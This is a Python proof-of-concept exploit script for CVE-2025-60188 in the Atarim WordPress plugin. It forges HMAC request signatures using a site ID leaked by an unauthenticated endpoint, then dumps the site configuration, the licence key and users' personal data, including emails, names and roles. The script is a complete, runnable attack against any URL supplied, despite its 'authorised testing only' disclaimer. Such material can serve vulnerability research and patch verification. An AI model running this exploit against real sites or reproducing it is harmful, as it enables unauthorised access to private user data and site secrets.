# ==============================================================================
# Author: m4sh_wacker
# Description: Proof-of-concept for CVE-2025-60188 (Atarim WordPress plugin). Reads the site ID from an unauthenticated REST endpoint, uses it as the HMAC-SHA256 key to forge the Request-Signature header, and calls admin-ajax actions that return site configuration (incl. licence key) and user PII. For authorised testing only.
# ==============================================================================
import requests
import hashlib
import hmac
import json
import sys
import urllib3
import re
import time
# Silences the InsecureRequestWarning that every verify=False request below
# would otherwise print. This is cosmetic only: TLS verification stays off,
# so the forged headers can be observed/relayed by anyone on the path.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def print_banner():
    """Print the tool's ASCII-art banner and author tag to stdout.

    Purely cosmetic; has no effect on the exploit flow.
    """
    banner = r"""
____ __ _ __ __
/ __ \________ ____ _____/ / / | / /__ / /_
/ / / / ___/ _ \/ __ \/ __ / / |/ / _ \/ __/
/ /_/ / / / __/ /_/ / /_/ / / /| / __/ /_
/_____/_/ \___/\__,_/\__,_/ /_/ |_/\___/\__/
Author: m4sh_wacker
"""
    print(banner)
class Colors:
    """ANSI SGR escape sequences used to colour terminal output.

    Every value is ESC (0x1b) followed by ``[<code>m``; ``ENDC`` resets all
    attributes.  Values are plain class attributes so callers can use them
    directly in f-strings.
    """

    HEADER = "\x1b[95m"   # bright magenta
    BLUE = "\x1b[94m"     # bright blue
    CYAN = "\x1b[96m"     # bright cyan
    GREEN = "\x1b[92m"    # bright green
    FAIL = "\x1b[91m"     # bright red
    WARNING = "\x1b[93m"  # bright yellow
    ENDC = "\x1b[0m"      # reset
    BOLD = "\x1b[1m"      # bold
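class AtarimUltimateExploit:
    """Proof-of-concept client for CVE-2025-60188 (Atarim WordPress plugin).

    What this class actually does:

    1. ``step_1_steal_id`` GETs ``/wp-json/atarim/v1/db/vc`` with no
       credentials and pulls ``wpf_site_id`` out of the response body.
    2. ``send_signed_request`` POSTs to ``admin-ajax.php`` with
       ``Request-Reference`` / ``Request-Signature`` headers, where the
       signature is HMAC-SHA256 over the reference string keyed with that
       site ID -- a "secret" the target itself just disclosed.
    3. ``run_exploit`` calls the ``wpf_website_details`` (site config,
       licence key) and ``wpf_website_users`` (user PII) actions and prints
       whatever comes back.

    That the plugin validates signatures this way is the PoC author's
    claim; nothing here verifies it independently.  Use only against
    systems you are authorised to test.

    TLS verification is off by default (``verify=False``) to match the
    original PoC; pass ``verify=True`` (or a CA-bundle path) so the
    forged headers and the dumped data are not exposed to an on-path
    attacker.
    """

    # Reference string that gets signed; it is sent in clear next to the
    # signature, so it carries no secret of its own.
    REFERENCE = "sys_admin_check"
    # Matches `"wpf_site_id":"123"` (what the original regex required) and
    # also an unquoted numeric value, in case the endpoint serialises the
    # ID as a JSON number.
    SITE_ID_RE = re.compile(r'"wpf_site_id"\s*:\s*"?(\d+)"?')
    GET_TIMEOUT = 15
    POST_TIMEOUT = 20
    # User-record keys rendered in the table; anything else is printed as
    # an "extra" beneath the row.
    KNOWN_USER_COLS = frozenset([
        'wpf_id', 'role', 'wpf_name', 'wpf_email',
        'first_name', 'last_name', 'is_admin',
        'wpf_display_name', 'wpf_user_avatar',
    ])

    def __init__(self, target, *, verify=False):
        """Prepare URLs and headers for *target* (``scheme://host``; trailing slash optional).

        Args:
            target: Base URL of the WordPress site.
            verify: Passed straight to ``requests`` -- ``False`` (default,
                as in the original PoC), ``True``, or a CA-bundle path.
        """
        self.target = target.rstrip('/')
        self.site_id = None
        self.verify = verify
        self.ajax_url = f"{self.target}/wp-admin/admin-ajax.php"
        self.rest_url = f"{self.target}/wp-json/atarim/v1/db/vc"
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': '*/*'
        }

    @classmethod
    def extract_site_id(cls, body):
        """Return the numeric ``wpf_site_id`` found in *body* as a string, or ``None``."""
        match = cls.SITE_ID_RE.search(body or "")
        return match.group(1) if match else None

    def step_1_steal_id(self):
        """Fetch the unauthenticated REST endpoint and record the site ID.

        Returns:
            ``True`` when ``self.site_id`` was set, ``False`` on a network
            error or when no ID is present in the response.
        """
        print(f"{Colors.BLUE}[*] Connecting to target to extract Site ID...{Colors.ENDC}")
        try:
            r = requests.get(
                self.rest_url,
                headers=self.headers,
                verify=self.verify,
                timeout=self.GET_TIMEOUT,
            )
        except requests.RequestException as e:
            print(f"{Colors.FAIL}[-] Connection Error: {e}{Colors.ENDC}")
            return False
        self.site_id = self.extract_site_id(r.text)
        if self.site_id is None:
            print(f"{Colors.FAIL}[-] Exploit Failed. Site ID not found in response.{Colors.ENDC}")
            return False
        # Nothing is "infected" at this point -- the message is the
        # original author's wording; all that happened is an ID disclosure.
        print(f"{Colors.GREEN}[+] TARGET INFECTED! Site ID Found: {self.site_id}{Colors.ENDC}\n")
        return True

    def _signature(self, reference):
        """Hex HMAC-SHA256 of *reference* keyed with the disclosed site ID."""
        return hmac.new(
            key=str(self.site_id).encode('utf-8'),
            msg=reference.encode('utf-8'),
            digestmod=hashlib.sha256,
        ).hexdigest()

    def send_signed_request(self, action_name):
        """POST an admin-ajax *action_name* with forged signature headers.

        Returns:
            The decoded JSON body on HTTP 200, otherwise ``None`` (no site
            ID yet, network error, non-200 status, or non-JSON body).
        """
        if not self.site_id:
            return None
        reference = self.REFERENCE
        auth_headers = dict(self.headers)
        auth_headers['Request-Reference'] = reference
        auth_headers['Request-Signature'] = self._signature(reference)
        try:
            r = requests.post(
                self.ajax_url,
                data={'action': action_name},
                headers=auth_headers,
                verify=self.verify,
                timeout=self.POST_TIMEOUT,
            )
        except requests.RequestException as e:
            print(f"{Colors.FAIL}[-] Request Error ({action_name}): {e}{Colors.ENDC}")
            return None
        if r.status_code != 200:
            print(f"{Colors.WARNING}[!] {action_name}: HTTP {r.status_code}{Colors.ENDC}")
            return None
        try:
            return r.json()
        except ValueError:
            # requests' JSONDecodeError subclasses ValueError.
            print(f"{Colors.WARNING}[!] {action_name}: response is not JSON{Colors.ENDC}")
            return None

    @staticmethod
    def _section(title, lead=""):
        """Print a coloured section banner; *lead* is emitted before the rule (e.g. ``"\\n"``)."""
        print(f"{lead}{Colors.HEADER}{'='*100}")
        print(f" {title}")
        print(f"{'='*100}{Colors.ENDC}")

    def _print_details(self, details):
        """Render the ``wpf_website_details`` payload (dict expected)."""
        print(f" {Colors.CYAN}Target URL:{Colors.ENDC} {details.get('url', 'N/A')}")
        print(f" {Colors.CYAN}Site Name:{Colors.ENDC} {details.get('name', 'N/A')}")
        license_key = details.get('wpf_license_key')
        if license_key and str(license_key).lower() != 'false':
            print(f" {Colors.CYAN}License Key:{Colors.ENDC} {Colors.FAIL}{license_key} (LEAKED!){Colors.ENDC}")
        else:
            print(f" {Colors.CYAN}License Key:{Colors.ENDC} {Colors.WARNING}Not Found / Free Version{Colors.ENDC}")
        print(f"\n {Colors.BOLD}[Internal Configurations]{Colors.ENDC}")
        settings = details.get('settings')
        if not isinstance(settings, list):
            settings = []  # tolerate null / unexpected shape instead of crashing mid-dump
        for s in settings:
            if not isinstance(s, dict):
                continue
            k = s.get('name', '').replace('wpf_', '').replace('_', ' ').title()
            v = str(s.get('value', ''))
            # Highlight values that look like e-mail addresses or admin-related.
            if '@' in v or 'admin' in v.lower():
                v = f"{Colors.GREEN}{v}{Colors.ENDC}"
            print(f" - {k:<30} : {v}")

    def _print_users(self, users):
        """Render the ``wpf_website_users`` payload (list expected) as a table."""
        header = "{:<5} | {:<15} | {:<20} | {:<30} | {:<15} | {:<15}".format(
            "ID", "ROLE", "USERNAME", "EMAIL", "FIRST NAME", "LAST NAME"
        )
        print(f"{Colors.BOLD}{header}{Colors.ENDC}")
        print("-" * 110)
        for u in users:
            if not isinstance(u, dict):
                print(f" {Colors.WARNING}-> {u}{Colors.ENDC}")
                continue
            uid = str(u.get('wpf_id', '-'))
            role = u.get('role', 'none')
            role = 'none' if role is None else str(role)  # a null role must not crash .lower()
            uname = u.get('wpf_name', 'unknown')
            uname = 'unknown' if uname is None else str(uname)
            email = u.get('wpf_email', 'unknown')
            email = 'unknown' if email is None else str(email)
            fname = str(u.get('first_name', '') or '')
            lname = str(u.get('last_name', '') or '')
            # Admin rows are highlighted in red.
            c_start, c_end = (Colors.FAIL, Colors.ENDC) if 'admin' in role.lower() else ("", "")
            print(f"{c_start}{uid:<5} | {role:<15} | {uname:<20} | {email:<30} | {fname:<15} | {lname:<15}{c_end}")
            extras = {k: v for k, v in u.items() if k not in self.KNOWN_USER_COLS and v}
            for k, v in extras.items():
                print(f" {Colors.WARNING}-> {k}: {v}{Colors.ENDC}")
        print(f"\n{Colors.GREEN}[+] Total Users Extracted: {len(users)}{Colors.ENDC}")

    def run_exploit(self):
        """Full chain: site-ID disclosure, then config and user dumps."""
        if not self.step_1_steal_id():
            return
        self._section("1. SYSTEM INTELLIGENCE (CONFIG & KEYS)")
        details = self.send_signed_request('wpf_website_details')
        if details and isinstance(details, dict):
            self._print_details(details)
        else:
            print(f"{Colors.FAIL} [-] Failed to dump system config.{Colors.ENDC}")
        time.sleep(1)
        self._section("2. COMPROMISED ACCOUNTS (FULL PII DUMP)", lead="\n")
        users = self.send_signed_request('wpf_website_users')
        if users and isinstance(users, list):
            self._print_users(users)
        else:
            print(f"{Colors.FAIL} [-] No users found or Access Denied.{Colors.ENDC}")
        self._section("EXPLOIT FINISHED", lead="\n")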
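if __name__ == "__main__":
    print_banner()
    # Take the target from argv first so the script can run non-interactively.
    # The original prompted on stdin *before* looking at argv, so a piped or
    # scripted run would block on the prompt even when a target was given.
    if len(sys.argv) > 1:
        target_site = sys.argv[1].strip()
    else:
        target_site = input(f"{Colors.BOLD}Enter Target Site URL (e.g., https://example.com): {Colors.ENDC}").strip()
    if not target_site:
        print(f"{Colors.FAIL}[-] No target URL supplied.{Colors.ENDC}")
        sys.exit(1)
    exploit = AtarimUltimateExploit(target_site)
    exploit.run_exploit()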